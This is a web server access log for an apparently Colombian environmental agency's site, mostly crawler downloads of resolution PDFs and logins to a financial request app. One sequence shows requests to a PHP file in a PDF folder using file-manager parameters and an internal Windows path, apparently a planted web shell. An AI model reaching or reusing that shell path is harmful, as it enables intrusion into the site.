201.245.192.253 - - [29/Mar/2024:21:56:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39660
69.63.189.120 - - [29/Mar/2024:21:57:00 -0500] "GET /images/mujeres-cuidadoras-humedales.jpeg HTTP/1.1" 200 122372
20.15.133.185 - - [29/Mar/2024:21:57:20 -0500] "GET /BLA/resoluciones/AUTOS%202022/2102.pdf HTTP/1.1" 200 478172
66.249.66.19 - - [29/Mar/2024:21:58:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/7175.pdf HTTP/1.1" 200 50738
168.119.253.69 - - [29/Mar/2024:21:59:17 -0500] "GET / HTTP/1.1" 200 4720
66.249.66.20 - - [29/Mar/2024:21:59:50 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202023/5132.pdf HTTP/1.1" 200 513103
216.245.221.92 - - [29/Mar/2024:22:00:02 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.21 - - [29/Mar/2024:22:00:34 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/5606.pdf HTTP/1.1" 200 467628
172.22.2.4 - - [29/Mar/2024:21:59:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2024:22:00:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
201.245.192.253 - - [29/Mar/2024:22:01:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39660
186.29.217.245 - - [29/Mar/2024:22:01:47 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12841
66.249.66.21 - - [29/Mar/2024:22:01:57 -0500] "GET /BLA/resoluciones/Autos%202008/2188.pdf HTTP/1.1" 200 83127
172.22.2.4 - - [29/Mar/2024:22:02:07 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=2808&usuario=&sector=&fecha=2021&resuelve= HTTP/1.1" 200 1089
87.236.176.151 - - [29/Mar/2024:22:02:10 -0500] "GET / HTTP/1.1" 200 319
181.61.78.137 - - [29/Mar/2024:22:02:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2808.pdf HTTP/1.1" 200 464987
181.61.78.137 - - [29/Mar/2024:22:02:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2808.pdf HTTP/1.1" 200 464987
181.61.78.137 - - [29/Mar/2024:22:02:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2808.pdf HTTP/1.1" 206 1025
47.128.28.239 - - [29/Mar/2024:22:02:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=3957.pdf HTTP/1.1" 200 3035
47.128.28.239 - - [29/Mar/2024:22:02:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.28.239 - - [29/Mar/2024:22:02:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.28.239 - - [29/Mar/2024:22:02:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_pdf HTTP/1.1" 200 1034
47.128.28.239 - - [29/Mar/2024:22:02:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.28.239 - - [29/Mar/2024:22:02:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.28.239 - - [29/Mar/2024:22:02:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.28.239 - - [29/Mar/2024:22:02:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.28.239 - - [29/Mar/2024:22:02:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.28.239 - - [29/Mar/2024:22:02:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.28.239 - - [29/Mar/2024:22:02:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
66.249.66.19 - - [29/Mar/2024:22:02:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202012/0415.pdf HTTP/1.1" 200 422093
172.22.2.4 - - [29/Mar/2024:22:02:56 -0500] "GET /BLA/boletinlegal/Circulares/2021/CIRCULAR%20No.%2000007%20DEL%2010%20DE%20AGOSTO%20DEL%202021.pdf HTTP/1.1" 200 266364
172.22.2.4 - - [29/Mar/2024:22:02:57 -0500] "GET /BLA/boletinlegal/Circulares/2021/CIRCULAR%20No.%2000006%20DEL%2005%20DE%20AGOSTO%20DEL%202021.pdf HTTP/1.1" 200 249615
172.22.2.4 - - [29/Mar/2024:22:03:04 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=795&usuario=&sector=&fecha=2021&resuelve= HTTP/1.1" 200 1101
181.61.78.137 - - [29/Mar/2024:22:03:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0795.pdf HTTP/1.1" 200 508846
181.61.78.137 - - [29/Mar/2024:22:03:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0795.pdf HTTP/1.1" 200 508846
181.61.78.137 - - [29/Mar/2024:22:03:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0795.pdf HTTP/1.1" 206 1025
181.61.78.137 - - [29/Mar/2024:22:03:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0795.pdf HTTP/1.1" 206 64512
191.95.61.89 - - [29/Mar/2024:22:03:40 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
191.95.61.89 - - [29/Mar/2024:22:03:40 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
191.95.61.89 - - [29/Mar/2024:22:03:41 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12411
191.95.61.89 - - [29/Mar/2024:22:03:41 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.61.89 - - [29/Mar/2024:22:03:41 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
191.95.61.89 - - [29/Mar/2024:22:03:41 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.61.89 - - [29/Mar/2024:22:03:41 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.61.89 - - [29/Mar/2024:22:03:41 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.61.89 - - [29/Mar/2024:22:03:41 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.61.89 - - [29/Mar/2024:22:03:41 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.61.89 - - [29/Mar/2024:22:03:42 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
173.252.83.119 - - [29/Mar/2024:22:03:59 -0500] "GET /images/mercados-campesinos-5-mayo.jpg HTTP/1.1" 200 95848
66.249.66.21 - - [29/Mar/2024:22:04:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%203401%20AL%203500/RESOLUCION%203452%20DE%202007.pdf HTTP/1.1" 200 879345
172.22.2.4 - - [29/Mar/2024:22:04:42 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=3426&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 1344
181.61.78.137 - - [29/Mar/2024:22:04:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/3426.pdf HTTP/1.1" 200 358419
181.61.78.137 - - [29/Mar/2024:22:04:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/3426.pdf HTTP/1.1" 200 358419
181.61.78.137 - - [29/Mar/2024:22:04:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/3426.pdf HTTP/1.1" 206 1025
216.245.221.92 - - [29/Mar/2024:22:05:02 -0500] "HEAD / HTTP/1.1" 200 -
186.29.217.245 - - [29/Mar/2024:22:05:07 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12853
69.171.249.6 - - [29/Mar/2024:22:05:43 -0500] "GET /mas-de-360-kilos-de-palmas-silvestres-fueron-incautados-en-bogota-durante-el-domingo-de-ramos.html HTTP/1.1" 206 1009
69.171.249.119 - - [29/Mar/2024:22:05:43 -0500] "GET /mas-de-360-kilos-de-palmas-silvestres-fueron-incautados-en-bogota-durante-el-domingo-de-ramos.html HTTP/1.1" 206 1009
69.171.249.4 - - [29/Mar/2024:22:05:43 -0500] "GET /mas-de-360-kilos-de-palmas-silvestres-fueron-incautados-en-bogota-durante-el-domingo-de-ramos.html HTTP/1.1" 206 1009
69.171.249.5 - - [29/Mar/2024:22:05:43 -0500] "GET /mas-de-360-kilos-de-palmas-silvestres-fueron-incautados-en-bogota-durante-el-domingo-de-ramos.html HTTP/1.1" 200 1009
69.171.249.120 - - [29/Mar/2024:22:05:43 -0500] "GET /mas-de-360-kilos-de-palmas-silvestres-fueron-incautados-en-bogota-durante-el-domingo-de-ramos.html HTTP/1.1" 206 1009
69.171.249.8 - - [29/Mar/2024:22:05:45 -0500] "GET /mas-de-360-kilos-de-palmas-silvestres-fueron-incautados-en-bogota-durante-el-domingo-de-ramos.html HTTP/1.1" 200 1009
69.171.249.120 - - [29/Mar/2024:22:05:45 -0500] "GET /mas-de-360-kilos-de-palmas-silvestres-fueron-incautados-en-bogota-durante-el-domingo-de-ramos.html HTTP/1.1" 200 1009
47.128.41.205 - - [29/Mar/2024:22:05:51 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202002%2FRES%202002%201351-1400%2F&order=desc&sort=size HTTP/1.1" 200 12140
47.128.41.205 - - [29/Mar/2024:22:05:52 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
47.128.41.205 - - [29/Mar/2024:22:05:52 -0500] "GET /BLA/resoluciones/dlf/unknown.png HTTP/1.1" 200 266
66.249.66.20 - - [29/Mar/2024:22:05:54 -0500] "GET /residuos/textiles/files/guia_textiles.pdf HTTP/1.1" 304 -
186.29.217.245 - - [29/Mar/2024:22:05:54 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12834
186.85.234.113 - - [29/Mar/2024:22:06:37 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
186.85.234.113 - - [29/Mar/2024:22:06:37 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.85.234.113 - - [29/Mar/2024:22:06:37 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12411
186.85.234.113 - - [29/Mar/2024:22:06:38 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.85.234.113 - - [29/Mar/2024:22:06:38 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [29/Mar/2024:22:06:38 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [29/Mar/2024:22:06:38 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [29/Mar/2024:22:06:38 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [29/Mar/2024:22:06:38 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [29/Mar/2024:22:06:38 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [29/Mar/2024:22:06:38 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
172.22.2.4 - - [29/Mar/2024:22:05:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
181.53.13.100 - - [29/Mar/2024:22:06:44 -0500] "GET /en-esta-navidad-bogota-esta-mejorando-con-mas-espacios-verdes-para-el-disfrute-de-la-ciudadania.html?fbclid=IwAR3womTRVYRaflRHFBqD71FurU_l7lkMPnn_oKwGAW57oKE9bFWWJYP6pg4 HTTP/1.1" 200 1114
201.245.192.253 - - [29/Mar/2024:22:06:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39660
186.85.234.113 - - [29/Mar/2024:22:06:55 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 2220
186.85.234.113 - - [29/Mar/2024:22:06:55 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [29/Mar/2024:22:06:57 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16329
186.85.234.113 - - [29/Mar/2024:22:06:57 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.85.234.113 - - [29/Mar/2024:22:06:57 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [29/Mar/2024:22:06:57 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [29/Mar/2024:22:06:57 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [29/Mar/2024:22:06:57 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [29/Mar/2024:22:06:57 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [29/Mar/2024:22:06:57 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [29/Mar/2024:22:06:57 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
186.85.234.113 - - [29/Mar/2024:22:07:12 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.85.234.113 - - [29/Mar/2024:22:07:12 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2658
186.85.234.113 - - [29/Mar/2024:22:07:13 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 64610
186.85.234.113 - - [29/Mar/2024:22:07:14 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.85.234.113 - - [29/Mar/2024:22:07:14 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [29/Mar/2024:22:07:14 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [29/Mar/2024:22:07:14 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [29/Mar/2024:22:07:14 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [29/Mar/2024:22:07:15 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [29/Mar/2024:22:07:15 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [29/Mar/2024:22:07:15 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1560
66.249.66.21 - - [29/Mar/2024:22:07:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/7629.pdf HTTP/1.1" 200 387718
172.22.2.4 - - [29/Mar/2024:22:05:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53419
186.85.234.113 - - [29/Mar/2024:22:08:00 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 4756
186.85.234.113 - - [29/Mar/2024:22:08:05 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 31620
186.29.217.245 - - [29/Mar/2024:22:08:06 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12903
186.85.234.113 - - [29/Mar/2024:22:08:14 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 31548
40.77.167.65 - - [29/Mar/2024:22:08:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2712.pdf HTTP/1.1" 200 368506
40.77.167.65 - - [29/Mar/2024:22:08:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/3398.pdf HTTP/1.1" 200 353183
186.85.234.113 - - [29/Mar/2024:22:08:32 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 32536
40.77.167.61 - - [29/Mar/2024:22:09:16 -0500] "GET /Publicaciones/2024EE53817.pdf HTTP/1.1" 404 227
186.85.234.113 - - [29/Mar/2024:22:09:28 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 150999
186.85.234.113 - - [29/Mar/2024:22:09:29 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.85.234.113 - - [29/Mar/2024:22:09:29 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [29/Mar/2024:22:09:29 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [29/Mar/2024:22:09:29 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [29/Mar/2024:22:09:29 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [29/Mar/2024:22:09:29 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [29/Mar/2024:22:09:29 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [29/Mar/2024:22:09:30 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
186.85.234.113 - - [29/Mar/2024:22:09:39 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 64610
186.85.234.113 - - [29/Mar/2024:22:09:39 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.85.234.113 - - [29/Mar/2024:22:09:39 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [29/Mar/2024:22:09:39 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [29/Mar/2024:22:09:39 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [29/Mar/2024:22:09:39 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [29/Mar/2024:22:09:39 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [29/Mar/2024:22:09:39 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [29/Mar/2024:22:09:40 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 58007
186.85.234.113 - - [29/Mar/2024:22:09:40 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 58007
186.85.234.113 - - [29/Mar/2024:22:09:41 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1560
186.85.234.113 - - [29/Mar/2024:22:09:41 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1568
186.85.234.113 - - [29/Mar/2024:22:09:42 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1568
172.22.2.4 - - [29/Mar/2024:22:09:48 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
172.22.2.4 - - [29/Mar/2024:22:09:48 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [29/Mar/2024:22:09:48 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [29/Mar/2024:22:09:48 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [29/Mar/2024:22:09:48 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [29/Mar/2024:22:09:48 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [29/Mar/2024:22:09:48 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [29/Mar/2024:22:09:48 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [29/Mar/2024:22:09:48 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [29/Mar/2024:22:09:48 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [29/Mar/2024:22:09:48 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [29/Mar/2024:22:09:48 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [29/Mar/2024:22:09:48 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [29/Mar/2024:22:09:48 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [29/Mar/2024:22:09:48 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [29/Mar/2024:22:09:48 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [29/Mar/2024:22:09:48 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [29/Mar/2024:22:09:48 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [29/Mar/2024:22:09:48 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [29/Mar/2024:22:09:48 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [29/Mar/2024:22:09:48 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [29/Mar/2024:22:09:48 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [29/Mar/2024:22:09:48 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [29/Mar/2024:22:09:48 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [29/Mar/2024:22:09:48 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [29/Mar/2024:22:09:48 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [29/Mar/2024:22:09:48 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [29/Mar/2024:22:09:48 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [29/Mar/2024:22:09:48 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [29/Mar/2024:22:09:48 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [29/Mar/2024:22:09:48 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [29/Mar/2024:22:09:48 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
216.245.221.92 - - [29/Mar/2024:22:10:02 -0500] "HEAD / HTTP/1.1" 200 -
186.85.234.113 - - [29/Mar/2024:22:10:20 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 4756
186.85.234.113 - - [29/Mar/2024:22:10:22 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 32184
51.222.253.10 - - [29/Mar/2024:22:11:16 -0500] "GET /portaldeninos/los-arboles/ HTTP/1.1" 200 87546
51.222.253.13 - - [29/Mar/2024:22:11:16 -0500] "GET /portaldeninos/los-arboles/tips/ HTTP/1.1" 200 87677
51.222.253.20 - - [29/Mar/2024:22:11:20 -0500] "GET /portaldeninos/parque-mirador-de-los-nevados/ HTTP/1.1" 200 89855
51.222.253.16 - - [29/Mar/2024:22:11:20 -0500] "GET /portaldeninos/publicidad/ HTTP/1.1" 200 87569
51.222.253.19 - - [29/Mar/2024:22:11:23 -0500] "GET /portaldeninos/ruido/ HTTP/1.1" 200 88494
51.222.253.7 - - [29/Mar/2024:22:11:26 -0500] "GET /portaldeninos/tipos-de-arboles-en-bogota/ HTTP/1.1" 200 109802
66.249.66.20 - - [29/Mar/2024:22:11:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/2554.pdf HTTP/1.1" 200 539503
201.245.192.253 - - [29/Mar/2024:22:11:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39660
66.249.66.20 - - [29/Mar/2024:22:11:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/3818.pdf HTTP/1.1" 200 483750
66.249.66.19 - - [29/Mar/2024:22:11:57 -0500] "GET /BLA/boletinlegal/Circulares/2023/CIRCULAR%20No.%2000009%20DEL%2010%20DE%20OCTUBRE%20DEL%202023.pdf HTTP/1.1" 200 529599
40.77.167.26 - - [29/Mar/2024:22:12:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1870.pdf HTTP/1.1" 200 438174
172.22.2.4 - - [29/Mar/2024:22:10:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2024:22:11:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
52.167.144.230 - - [29/Mar/2024:22:14:05 -0500] "GET /BLA/resoluciones/AUTOS%202023/9294.pdf HTTP/1.1" 304 -
216.245.221.92 - - [29/Mar/2024:22:15:02 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.230 - - [29/Mar/2024:22:16:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/0133.pdf HTTP/1.1" 200 355801
